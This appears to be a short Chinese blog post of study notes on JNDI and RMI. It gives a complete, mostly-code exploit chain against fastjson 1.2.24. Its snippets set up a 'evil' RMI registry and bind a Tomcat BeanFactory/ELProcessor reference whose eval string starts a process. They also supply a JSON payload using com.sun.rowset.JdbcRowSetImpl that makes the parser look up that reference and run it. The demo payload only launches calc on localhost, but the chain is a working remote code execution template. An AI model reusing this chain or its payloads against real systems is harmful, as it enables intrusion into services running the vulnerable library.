zoukankan      html  css  js  c++  java
  • jndi和rmi学习

     1.程序1启动rmi管理服务

    System.out.println("Creating evil RMI registry on port 9527");
    LocateRegistry.createRegistry(1111);
    System.out.println("======启动Rmi成功!======");
    Thread.currentThread().join();

    2.程序2注册rmi服务

    ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
    ref.add(new StringRefAddr("forceString", "x=eval"));
    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));

    ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
    Naming.bind("rmi://127.0.0.1:1111/service1", referenceWrapper);
    System.out.println("RMI服务启动成功,服务地址:" + "rmi://127.0.0.1:1111/service1");

    3.程序3中fastjson序列号中会用到rmi服务,执行注册到rmi服务中的服务,
    <fastjson.version>1.2.24</fastjson.version>
    String json="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1111/service1\",\"autoCommit\":true}";
    JSON.parseObject(json);

    4.因为fastjson的parseObject方法中会使用到jndi查找方法,类似this.registry.lookup("rmi://127.0.0.1:1111/service1");,这句就会触发具体远程方法的执行,导致漏洞被利用
  • 相关阅读:
    POJ 1095 Trees Made to Order 最详细的解题报告
    Producter and Consumer
    How to use the function of bind
    How to use the functions of apply and call
    Configurate vim tool
    #4713. 方程
    #4709. 树
    #4718. 管理
    #4710. 并
    #4707. 点分治
  • 原文地址:https://www.cnblogs.com/AlanWinFun/p/15735324.html
Copyright © 2011-2022 走看看